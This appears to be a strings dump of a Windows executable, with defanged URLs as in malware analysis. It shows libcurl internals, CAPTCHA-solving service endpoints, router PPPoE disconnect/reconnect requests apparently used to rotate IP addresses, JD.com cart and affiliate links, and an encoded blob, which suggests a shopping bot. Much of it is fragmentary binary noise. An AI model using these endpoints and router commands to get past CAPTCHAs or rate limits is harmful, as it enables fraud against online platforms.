UU U!"UU#$UUUU%&'UUU(U)*U UUU,-.UU/0123UUUUUU4UUUUUUU5UUUUUU6789:;UUUUUUUU<UUU=>?@ABCDUUUUEUUUUFUUUUUUGUUHIUUUUUJKUUULLUUMUUUUUUUUUNUUOUPQRSUUT
!"FFF#F$Fÿ&F'()FFFFFFFFFFFFF*FFFFFFFFFFFF FF,-FFFFFFFFFFF.F/FFFFFFFFFFFFFF01FF234FF56789FFFFFFFF:;FF<=>FF?FFFFF@ABFFFFFCFDFFFFFE
%u$Wj%
t.Gj:W
.jpeg
; filename="%s"
------------------------xx
--%s--
couldn't open file "%s"
Content-Type: %s
Content-Type: multipart/mixed, boundary=%s
%s; boundary=%s
%%X
Could not resolve %s: %s
getaddrinfo() failed for %s:%d; %s
init_resolve_thread() failed for %s; %s
%s:%d
Added %s:%d:%s to DNS cache
Resolve %s found illegal!
%5[^:]:%d:%5s
Curl_addHandleToPipeline: length: %d
About to connect() to %s%s port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode domains
Protocol %s not supported or disabled in libcurl
http_proxy
Port number too large: %lu
%s://%s%s%s:%hu%s%s%s
;type=%c
[%*45[0123456789abcdefABCDEF:.]%c
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Server doesn't support pipelining
Found bundle for host %s: %p
Connection #%ld to host %s left intact
Rebuilt URL to: %s
smtp
SMTP.
<url> malformed
:]://%[^
[^:]:%[^
Re-using existing connection! (#%ld) with host %s
Found connection %ld, with requests in the pipe (%zu)
%s://%s
Internal error removing splay node = %d
Internal error clearing splay node = %d
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
In state %d with no easy_conn, bail out!
Pipe broke: handle 0x%p, url = %s
[%s %s %s]
Send failure: %s
Recv failure: %s
%s cookie %s="%s" for domain %s, path %s, expire %lld
#HttpOnly_
skipped cookie with bad tailmatch domain: %s
httponly
23[^;
=]=I99[^;
%s%s%s
# Fatal libcurl error
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
WARNING: failed to save cookies in %s
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Failed to set SO_KEEPALIVE on fd %d
bind failed with errno %d: %s
Local port: %hu
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Bind to local port %hu failed, trying next
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
ssloc inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
getpeername() failed with errno %d: %s
TCP_NODELAY set
Could not set TCP_NODELAY: %s
Failed to connect to %s: %s
Trying %s...
sa_addr inet_ntop() failed with errno %d: %s
couldn't connect to %s at %s:%ld
Failed connect to %s:%ld; %s
Unable to parse FTP file list
Error in the SSH layer
Caller must register CURLOPT_CONV_ callback options
TFTP: No such user
TFTP: Unknown transfer ID
TFTP: Illegal operation
TFTP: Access Violation
TFTP: File Not Found
Login denied
Issuer check against peer certificate failed
Invalid LDAP URL
Unrecognized or bad HTTP Content or Transfer-Encoding
Problem with the SSL CA cert (path? access rights?)
Peer certificate cannot be authenticated with given CA certificates
Problem with the local SSL certificate
SSL peer certificate or SSH remote key was not OK
An unknown option was passed in to libcurl
A libcurl function was given a bad argument
Operation was aborted by an application callback
FTP: command REST failed
FTP: command PORT failed
HTTP response code said error
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't set file type
FTP: can't figure out the host in the PASV response
FTP: unknown 227 response format
FTP: unknown PASV reply
FTP: unknown PASS reply
FTP: The server did not accept the PRET command.
FTP: Accepting server connect has timed out
FTP: The server failed to connect to data port
FTP: weird server reply
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
URL using bad/illegal format or missing URL
Unsupported protocol
Winsock version not supported
Protocol family not supported
Address family not supported
Operation not supported
Socket is unsupported
Protocol is unsupported
Protocol option is unsupported
Unknown error %d (%#x)
0123456789
%d.%d.%d.%d
%s%s%s%s%s%s
Session: %s
%s %s RTSP/1.0
Range: %s
Referer: %s
Accept-Encoding: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Transport: %s
Transport:
Refusing to issue an RTSP request [%s] without a session ID.
Got RTSP Session ID Line [%s], but wanted ID [%s]
Unable to read the CSeq header: [%s]
SMTP
EHLO %s
HELO %s
No known authentication mechanisms supported!
AUTH %s %s
LOGIN
AUTH %s
MAIL FROM:%s SIZE=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s
RCPT TO:<%s>
RCPT TO:%s
Got unexpected smtp-server response: %d
STARTTLS denied. %c
STARTTLS not supported.
Remote access denied: %d
Access denied: %d
Authentication failed: %d
MAIL failed: %d
RCPT failed: %d
SMTPS not supported!
USER %s
APOP %s %s
%s %s
STLS not supported.
Access denied. %c
PASS %s
POP3S not supported!
IMAPS not supported!
%cd
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
LIST "%s" *
SELECT %s
FETCH %s BODY[%s]
APPEND %s (\Seen) {%lld}
LOGINDISABLED
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
invalid tsize -:%s:- value in OACK packet
%s (%ld)
blksize is smaller than min supported
%s (%d)
blksize is larger than max supported
%s (%d) %s (%d)
got option=(%s) value=(%s)
tftp_rx: internal error
Timeout waiting for block %d ACK. Retries = %d
Received unexpected DATA packet block %d, expecting block %d
Received last DATA packet block %d again.
tftp_tx: internal error, event: %i
tftp_tx: giving up waiting for block %d ack
Received ACK for block %d, expecting %d
bind() failed; %s
tftp_send_first: internal error
%s%c%s%c
TFTP finished
TFTP response timeout
Can't get the size of %s
Can't open %s for writing
Last-Modified: %s, d %s M d:d:d GMT
Couldn't open file %s
There are more than %d entries
LDAP remote: %s
LDAP local: ldap_simple_bind_s %s
LDAP local: Cannot connect to %s:%ld
LDAP local: trying to establish %s connection
LDAP local: %s
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
CLIENT libcurl 7.32.0
MATCH %s %s %s
DEFINE %s %s
insufficient winsock version to support telnet
WSAStartup failed (%d)
%s %d %d
%s %s %d
%s %s %s
%s IAC %d
%s IAC %s
Sending data failed (%d)
%d (unknown)
%s (unsupported)
%s IAC SB
Unknown telnet option %s
Syntax error in telnet option: %s
7[^= ]%*[ =]%5s
USER,%s
%c%c%c%c%s%c%c
%c%s%c%s
7[^,],7s
%c%c%c%c
FreeLibrary(wsock2) failed (%d)
WSACloseEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACreateEvent failed (%d)
failed to find WSAEnumNetworkEvents function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSACreateEvent function (%d)
failed to load WS2_32.DLL (%d)
WS2_32.DLL
PORT
Failure sending PORT command: %s
,%d,%d
Failure sending EPRT command: %s
%s |%d|%s|%hu|
bind() failed, we ran out of ports!
bind(port=%hu) failed: %s
bind(port=%hu) on non-local address failed: %s
socket failure: %s
failed to resolve the address provided to PORT: %s
getsockname() failed: %s
Connect data stream passively
STOR %s
APPE %s
SIZE %s
RETR %s
ftp server doesn't support SIZE
PBSZ %d
Access denied: d
ACCT %s
ACCT rejected by server: d
Connecting to %s (%s) port %d
Failure sending QUIT command: %s
Uploading to a URL without a file name!
FTPS not supported!
FTP response aborted due to select/poll error: %d
FTP response timeout
MDTM %s
Bad PASV/EPSV response: d
Can't resolve new host %s:%hu
Can't resolve proxy host %s:%hu
Skips %d.%d.%d.%d for data connection, uses %s instead
%d,%d,%d,%d,%d,%d
Illegal port number in EPSV reply
%c%c%c%u%c
ddd d:d:d GMT
dddddd
unsupported MDTM reply format
QUOT string not accepted: %s
Wildcard - "%s" skipped by user
Wildcard - START of "%s"
Preparing for accepting server on data port
CWD %s
Failed FTP upload: 

RETR response: d
server did not report OK, got %d
Failure sending ABOR command: %s
Remembering we are in dir "%s"
ftp_perform ends with SECONDARY: %d
PRET RETR %s
PRET STOR %s
PRET %s
REST %d
Got a d response code instead of the assumed 200
TYPE %c
Failed to do PORT
PRET command not accepted: d
Failed to MKD dir: d
MKD %s
QUOT command failed with d
Entry path is '%s'
PROT %c
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
Got a d ftp-server response when 220 was expected
%sAuthorization: Basic %s
%s:%s
%s auth using %s with user '%s'
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %d
The requested URL returned error: %s
If-Unmodified-Since: %s
Last-Modified: %s
If-Modified-Since: %s
%s, d %s M d:d:d GMT
Failed sending HTTP POST request
Internal HTTP POST error!
Failed sending HTTP request
%s%s=%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
PTF://%s:%s@%s
Content-Range: bytes %s/%lld
Content-Range: bytes %s%lld/%lld
Range: bytes=%s
PTF://
Host: %s%s%s:%hu
Host: %s%s%s
Chunky upload is not supported by HTTP 1.0
HTTP error before end of send, stop sending
HTTP/1.0 connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 proxy connection set to keep alive!
HTTP 1.0, assume close after body
RTSP/%d.%d =
HTTP =
HTTP/%d.%d =
%s, algorithm="%s"
%s, opaque="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%s:%s:x:%s:%s:%s
%s:%.*s
%s:%s:%s
xxxx
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
SOCKS4%s request granted.
Failed to resolve "%s" for SOCKS4 connect.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
SOCKS5 GSSAPI per-message authentication is not supported.
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Failed to resolve "%s" for SOCKS5 connect.
User was rejected by the SOCKS5 server (%d %d).
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
Received HTTP code %d from proxy after CONNECT
CONNECT %s HTTP/%s
%s%s%s%s
Host: %s
%s%s%s:%hu
%s:%hu
Establish HTTP proxy tunnel to %s:%hu
TUNNEL_STATE switched to: %d
HTTP/1.%d %d
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
operation aborted by callback
ioctl callback returned error %d
the ioctl callback returned %d
seek callback returned error %d
Problem (%d) in the Chunked-Encoded data
HTTP server doesn't seem to support byte ranges. Cannot resume.
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Rewinding stream by : %zd bytes on url %s (zero-length body)
Operation timed out after %ld milliseconds with %lld bytes received
No URL set!
[^?&/:]://%c
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Issue another request to this URL: '%s'
Conn: %ld (%p) Receive pipe weight: (%lld/%zu), penalized: %s
Site %s:%d is pipeline blacklisted
Server %s is blacklisted
Server %s is not blacklisted
- Conn %ld (%p) send_pipe: %zu, recv_pipe: %zu
Adding handle: recv: %d
Adding handle: send: %d
d:d
d:d:d
%s xxxxxxxxxxxxxxxx
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
%s/%s
12345678
00000001
%c%c==
%c%c%c=
0123456789-
Visual C   CRT: Not enough memory to complete call to strerror.
hXXp://api.yundama.net:5678/api.php
appkey
YDMAPI/1.0.0.6
login
report
file://%s
WLDAP32.dll
YDM_EasyReport
7%7s7}7
1014181<1@1}1
0 2=263 4
9%9s<c=
6 6$6(6,686
5$5@50686
6$7(7,7074787
0 0<0@0`0
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
VBYB_ReportError
VB_ReportError
debug.ini
ReportError:%s
Error:%s
%s|!|%s
\dms.pdb
%u%u,
dclog.txt
config.ini
port
settimeout:%d
[%d]%s
reg2:%s
checkok:%s %s
check fail:%s %s %s
check:%s %s
getcjfail:%s %s
getcj:%s %s
%s%uout
%s%uin
put img ok:%s
put img fail:%s
put img:%s %s %d
get result ok:%s,%s
get result fail:%s
get result:%s
notifyfail ok:%s
%s\%d-%s.png
notifyfail fail:%s,%s
notifyfail:%s
getimgok:%s,%s
getimg:%s
getinfo fail:%s
getinfo:%s,%s
setresult:%s,%s
HTTP/1.1 200 OK
recv:%d
send:%d
GET /ip.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
select:%d
ioctlsocket:%d
socket:%d
api.qqchaoren.net
14.17.65.24
14.17.65.23
dama2.qqchaoren.net
dama1.qqchaoren.net
connect total:%s %d
:%s %d
connect discard:%s %d
[d-d-d d:d:d](u)
recv timeout:<%d>
recvfail:<%d>%d
server close:<%d>%d
recv:<%d>%d
send:<%d>%d
sendfail:<%d>%d
connect timeout:<%d>
connectok:<%d>%s %hu
127.0.0.1
1.1.3
4-WR842N7.0.ini
LoginURL=/842N7.0
LoginPOST=null
LoginRefer=
DisconnURL=/
DisconnPOST={"network":{"change_wan_status":{"proto":"pppoe","operate":"disconnect"}},"method":"do"}
ConnURL=/
ConnPOST={"network":{"change_wan_status":{"proto":"pppoe","operate":"connect"}},"method":"do"}
ConnFlag2={"protocol":{"wan":{"wan_type":"pppoe"},"pppoe":{"username":"{username}","password":"{password}"}},"method":"set"}
.iqW>
"3/%F
QChKaS0w2IFa01xcZscPwwIRZPKKF7hneArrlg4/DqAhzueRL XnfDRQP8Qsa Le 0rAa/MF0KL7sIeVSnjfT5TBK8hHXGDRUV9ug71a1OgQZ1gIEmBukY05bNNyAk86JT1FwwA1 yQ4f3lkLoCazBqhsd5KN/UZpkgZfq4yyRfwmiruw5MHDzFasVCKtSEKlfi/Onp1dOvUJ2Ezhn9nFGY/X5t1zqfwc2GZ ohdEkiRRk4XT/XEQeHUD9KsTfOplYB0KethUTfpTaEi1JvE1ZMK3fYb gX3sdMVJnJk3lRpZJLjIuyYQiDnnFddvjHdlXvxRNJ1Sd9sal0sIqu41E2A qwsrBCpzxRLubxTF10WJLRZs9D2K16CqSsai3QEkM/ipWzgfeefD9usX6mEQkoZdJMY8qTZTyPvENOl8czSsHULfAUB8K/KUU7IpA/Ws0gaTVNqoP9UGRrSqH0nklsd7VyDtdJ7xIkDY2TeGk6ETFdqVQTQ4gVwZI7gPUC7DhKYDEOj2HR3UOtxS0UwMXFjgCGycpyAwTU/5M5AG e1n0mCA7/qPVFSs w7COnM atO5gAMu/gTcSe2E3PfmWNewGICca9LUOJBLXKIMnQJPpJdoWhCLx3KOr/0xJ7ifb593PnVSxHz/dBIEi8KLoMiTDt/CKuYMtLy uPlGsnQNxa8dG4Es9v23CeI2JCnIfshsOZZOVud6mf zFh6Q3gx1tU3vopb7sy3BKYj1 K tZFbPILPiSDj76McJWJZJF0fXTabO N7Ngfuwf2 KAi7f/x376bRdMcMYU2Du96FpP0r92b/58uOOZ4ZtPcuwDBGgfmt1ckS7tCnBKuJ4 L a2P PB7o6cLgomAbvQIbZSdZgp8oHSXwFjReZtXy9HBgMaOTwt ScjhGBao Gf/bWl2DliYHY76ht6LIfs48dbXMIziJyLB8Qzcjkh6dg6uFxRbLs3nZmB9Ci1UTO2i5oz3D r0Gkb/PGmrhEd hvA4NBXF/rhUyUSk4xc5vqU5fxKJpIBdq1v/meuSsSeKUONTmOV1PU2H2QSXYMaJHQ160Mn6DTv8ye0PTOQ/i1IVdid1Bzr9O0v 2XasQtIckeHojt83wvCZI7v4yU5BetNSrzwx3B3T38GyUtjY45t3zX7ELCVfLARoHs9JWAqm99m1G37X piHokWGVdbj63lFOudLaBoxI/YD3hBRJzBtceigH2CX820nulgXhl0opU nVnJ93jsa/YZf9AgP7PEsreu4p253a/oNl0/QMPTtc1wCaIdsD9OGP5xp3dgw8h/40gAshPj2JkJeQRJTGZF1AJRAv5Es6PNDnuE ZhEVXosLxQytBFyaMWu9WX9Mqzbs7jGsYlJCwfiBdNl85TvWPAf6Q3ZCgUpXKKB/GzwsQVGXTV8tFms3WK7fIOFO5s7hpnsPb6D2PdBzvqtL4O3WC8oXG2KXSnftvTvPb1RKDGL0NqXOVBrGuwKgWYko9fn6iiy45Th7St36T3q2L4FeTzHcWwSERb9 c8hbng5ePLDx8IhIPVgVoWUiminpY2wyarWGXQCWi0nTHCqrRM6JEK4gFgau2ZujB2v2gkmZBvEpzt/GfQ2H7W8vFxDzYIssTpM L wiShWummTI3MSMNPUARcHXMLcI SA2LuuSOqN0ti13wiS4n56iwGafngBqCN0NL9AtPapNPM4NQ==
c:\kss.ini
SetClientCertificate
MSScriptControl.ScriptControl
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf()) ?
this.getUTCFullYear()   '-'  
f(this.getUTCMonth()   1)   '-'  
f(this.getUTCDate())   'T'  
f(this.getUTCHours())   ':'  
f(this.getUTCMinutes())   ':'  
f(this.getUTCSeconds())   'Z' : null;
String.prototype.toJSON =
Number.prototype.toJSON =
Boolean.prototype.toJSON = function (key) {
return this.valueOf();
'"' : '\\"',
'\\': '\\\\'
escapable.lastIndex = 0;
return escapable.test(string) ? '"'   string.replace(escapable, function (a) {
'\\u'   ('0000'   a.charCodeAt(0).toString(16)).slice(-4);
function str(key, holder) {
// Produce a string from holder[key].
k, // The member key.
value = holder[key];
typeof value.toJSON === 'function') {
value = value.toJSON(key);
value = rep.call(holder, key, value);
if (Object.prototype.toString.apply(value) === '[object Array]') {
length = value.length;
// Join all of the elements together, separated with commas, and wrap them in
v = partial.length === 0 ? '[]' : gap ?
'[\n'   gap   partial.join(',\n'   gap)   '\n'   mind   ']' :
'['   partial.join(',')   ']';
length = rep.length;
partial.push(quote(k)   (gap ? ': ' : ':')   v);
// Otherwise, iterate through all of the keys in the object.
if (Object.prototype.hasOwnProperty.call(value, k)) {
// Join all of the member texts together, separated with commas,
v = partial.length === 0 ? '{}' : gap ?
'{\n'   gap   partial.join(',\n'   gap)   '\n'   mind   '}' :
'{'   partial.join(',')   '}';
if (typeof JSON.stringify !== 'function') {
JSON.stringify = function (value, replacer, space) {
// that can replace values, or an array of strings that will select the keys.
typeof replacer.length !== 'number')) {
throw new Error('JSON.stringify');
// Make a fake root object containing our value under the key of ''.
if (typeof JSON.parse !== 'function') {
JSON.parse = function (text, reviver) {
function walk(holder, key) {
var k, v, value = holder[key];
if (Object.prototype.hasOwnProperty.call(value, k)) {
return reviver.call(holder, key, value);
// Parsing happens in four stages. In the first stage, we replace certain
cx.lastIndex = 0;
if (cx.test(text)) {
text = text.replace(cx, function (a) {
('0000'   a.charCodeAt(0).toString(16)).slice(-4);
// We split the second stage into 4 regexp operations in order to work around
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')
.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {
// JavaScript structure. The '{' operator is subject to a syntactic ambiguity
// In the optional fourth stage, we recursively walk the new structure, passing
throw new SyntaxError('JSON.parse');
// These forms are obsolete. It is recommended that JSON.stringify and
// JSON.parse be used instead.
if (!Object.prototype.toJSONString) {
Object.prototype.toJSONString = function (filter) {
return JSON.stringify(this, filter);
Object.prototype.parseJSON = function (filter) {
return JSON.parse(this, filter);
JSON.stringify(
.push(
.map)'){
.splice(
) {ary=ary  key ','; }
var ary=''; for (var key in
VBScript.RegExp
&password=
&softkey=
Content-Disposition: form-data; name="password"
{pass}
Content-Disposition: form-data; name="softkey"
{softkey}
Content-Disposition: form-data; name="image"; filename="System.Byte[]"
hXXp://item.m.jd.com/product/1684485.html?pass_utm=1&&resourceType=M_APP_SAOMA
hXXp://m.jd.com
VVV.yiqifa.com ,
hXXp://p.yiqifa.com/n?k=xxxxxxxxxx&&t=hXXp://m.jd.com
hXXp://dwz.cn/1gqDyX
hXXp://VVV.51bi.com/u/fIZJfe/
Adobe Photoshop CS6 (Windows)
2015:04:04 17:49:43
urlTEXT
MsgeTEXT
hXXp://ns.adobe.com/xap/1.0/
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpTPg="hXXp://ns.adobe.com/xap/1.0/t/pg/" xmlns:stDim="hXXp://ns.adobe.com/xap/1.0/sType/Dimensions#" xmlns:xmpG="hXXp://ns.adobe.com/xap/1.0/g/" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" dc:format="image/jpeg" xmp:CreatorTool="Adobe Photoshop CS3 Windows" xmp:CreateDate="2015-03-18T06:27:23-08:00" xmp:ModifyDate="2015-04-04T17:49:43 08:00" xmp:MetadataDate="2015-04-04T17:49:43 08:00" xmpMM:DocumentID="uuid:203215D67ACDE4119A3791C01358868A" xmpMM:InstanceID="xmp.iid:ECEBAA42AADAE411B1E9BFB81E2C8070" xmpMM:OriginalDocumentID="uuid:203215D67ACDE4119A3791C01358868A" photoshop:LegacyIPTCDigest="00BEF17FF3A3729CC01FC79F654C4795" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpTPg:NPages="1" xmpTPg:HasVisibleTransparency="False" xmpTPg:HasVisibleOverprint="False" xmpRights:Marked="False"> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">new Green</rdf:li> </rdf:Alt> </dc:title> <xmpMM:DerivedFrom stRef:instanceID="uuid:AEC8A14A78CDE41190D6DD5F60A0D0DC" stRef:documentID="uuid:ADC8A14A78CDE41190D6DD5F60A0D0DC"/> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:EBEBAA42AADAE411B1E9BFB81E2C8070" stEvt:when="2015-04-04T17:49:43 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:ECEBAA42AADAE411B1E9BFB81E2C8070" stEvt:when="2015-04-04T17:49:43 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <xmpTPg:MaxPageSize stDim:w="1200.000000" stDim:h="1000.000000" stDim:unit="Pixels"/> <xmpTPg:PlateNames> <rdf:Seq> <rdf:li>Cyan</rdf:li> <rdf:li>Magenta</rdf:li> <rdf:li>Yellow</rdf:li> </rdf:Seq> </xmpTPg:PlateNames> <xmpTPg:SwatchGroups> <rdf:Seq> <rdf:li xmpG:groupName="Default Swatch Group" xmpG:groupType="0"/> </rdf:Seq> </xmpTPg:SwatchGroups> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
u]%f#7
[873271]
10|20|50
8:00-20:00
14-1114-19783
24-2144-3906
26-2951-2952
29-2580-2581
hXXp://pan.baidu.com/s/1mgkyEbY
[3819916:675971,1398976]
.nfH-
* ;.ggy
wd.cfC
Y2 r7.GQ
wEË
QB.od
(-l}@
hXXp://cart.jd.com/cart/addToCart.html?rcd=1&pid=1480390408_1520813958_1532486013&rid=1430806104479
2015:05:05 13:09:00
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:dc="hXXp://purl.org/dc/elements/1.1/" xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmp:CreateDate="2015-05-05T13:04 08:00" xmp:ModifyDate="2015-05-05T13:09 08:00" xmp:MetadataDate="2015-05-05T13:09 08:00" dc:format="image/jpeg" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:04EF9FC2E0F2E411B346F97AECF82ED5" xmpMM:DocumentID="xmp.did:03EF9FC2E0F2E411B346F97AECF82ED5" xmpMM:OriginalDocumentID="xmp.did:03EF9FC2E0F2E411B346F97AECF82ED5"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:03EF9FC2E0F2E411B346F97AECF82ED5" stEvt:when="2015-05-05T13:04 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)"/> <rdf:li stEvt:action="converted" stEvt:parameters="from image/png to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:04EF9FC2E0F2E411B346F97AECF82ED5" stEvt:when="2015-05-05T13:09 08:00" stEvt:softwareAgent="Adobe Photoshop CS6 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>
.akH"
.lCj:
B#Xn.mR6-^
t-j}e/
.HDF3
ZO,%c
I:\<r
hXXp://item.jd.com/1250128.html
1250128
[1848484:595936,1276440]
hXXp://VVV.jd.com/suit/show.html?suitId=1848484&skuIds=595936,1276440
[1848484:::595936,1276440]
'/.Wj
_".Sq0
30000000000
10000000000
OQ^^.FE:rDA
o.Sqw
60000000000
9*.ihd
fúd
5444444444
04444444444
44444444
bU.Yn
54444444
\.SW`
.vH$K
).iN'
C%9?
mi?x%XxY
8 _%d
.MQol
Q.Ms2
 L.cC
%d&&'
00003333
?456789:;<=
!"#$%&'()* ,-./0123
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSH_SCROLL_LINES_MSG
JOIN
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
iphlpapi.dll
MPR.dll
VERSION.dll
.PAVCException@@
;Driver={Microsoft Access Driver (*.mdb)};FIL=MS Access
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
ExecuteSql
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
libpng warning: %s
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
;3 #>6.&
'2, / 0&7!4-)1#
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
Excel.Application
BDGetColSQLType
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
.PAVCDBException@@
right-curly-bracket
left-curly-bracket
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
xxxxxx
hXXp://proxy.mimidama.net:
hXXp://proxy.mimidama.com:
&ID=%d&sid=%s&skey=
/Upload/MMReportError.aspx?key=
&id=%d
/Upload/MMResult.aspx?key=
/Service/TSServerConfig.aspx
hXXp://common2.mimidama.com:
hXXp://common1.mimidama.com:
hXXp://common.mimidama.com:
1.0.0.5
/Upload/Processing.aspx
/Upload/MMLogin.aspx?U=
mimiKEY
UKEY
